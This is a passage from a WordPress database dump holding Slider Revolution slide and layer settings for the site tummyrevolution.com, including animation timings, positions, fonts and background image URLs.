ds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"282px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"195px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(15,7,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]}}','[]','{\"0\":\"\",\"version\":\"6.1.6\"}'),(16,7,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide2-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]}}','[]','{\"0\":\"\",\"version\":\"6.1.6\"}'),(17,7,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide3-backgroun.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]}}','[]','{\"0\":\"\",\"version\":\"6.1.6\"}'),(18,8,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide1-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"Power3.easeOut\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide1-graphic2.png\",\"imageId\":593},\"size\":{\"width\":{\"d\":{\"v\":\"491px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"300px\",\"e\":true},\"m\":{\"v\":\"199px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"427px\",\"e\":true},\"n\":{\"v\":\"258px\",\"e\":true},\"t\":{\"v\":\"261px\",\"e\":true},\"m\":{\"v\":\"173px\",\"e\":true}},\"originalWidth\":491,\"originalHeight\":427,\"aspectRatio\":{\"d\":{\"v\":1.1498829039812645813611879930249415338039398193359375},\"n\":{\"v\":1.1498829039812645813611879930249415338039398193359375},\"t\":{\"v\":1.1498829039812645813611879930249415338039398193359375},\"m\":{\"v\":1.1498829039812645813611879930249415338039398193359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"525px\",\"e\":true},\"n\":{\"v\":\"350px\",\"e\":true},\"t\":{\"v\":\"-184px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"256px\",\"e\":true},\"n\":{\"v\":\"135px\",\"e\":true},\"t\":{\"v\":\"-305px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":1000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":580,\"start\":1000,\"startRelative\":-600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(19,8,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"Power3.easeOut\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}}}','{\"3\":{\"text\":\"Image 2\",\"alias\":\"Graphic\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic2.png\",\"imageId\":611},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"256px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"251px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"434px\",\"e\":true},\"n\":{\"v\":\"252px\",\"e\":true},\"t\":{\"v\":\"393px\",\"e\":true},\"m\":{\"v\":\"247px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":434,\"aspectRatio\":{\"d\":{\"v\":1.016129032258064501803573875804431736469268798828125},\"n\":{\"v\":1.016129032258064501803573875804431736469268798828125},\"t\":{\"v\":1.016129032258064501803573875804431736469268798828125},\"m\":{\"v\":1.016129032258064501803573875804431736469268798828125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-481px\",\"e\":true},\"n\":{\"v\":\"-275px\",\"e\":true},\"t\":{\"v\":\"142px\",\"e\":true},\"m\":{\"v\":\"-14px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-158px\",\"e\":true},\"n\":{\"v\":\"-131px\",\"e\":true},\"t\":{\"v\":\"124px\",\"e\":true},\"m\":{\"v\":\"-105px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power1.easeInOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power1.easeInOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":580,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]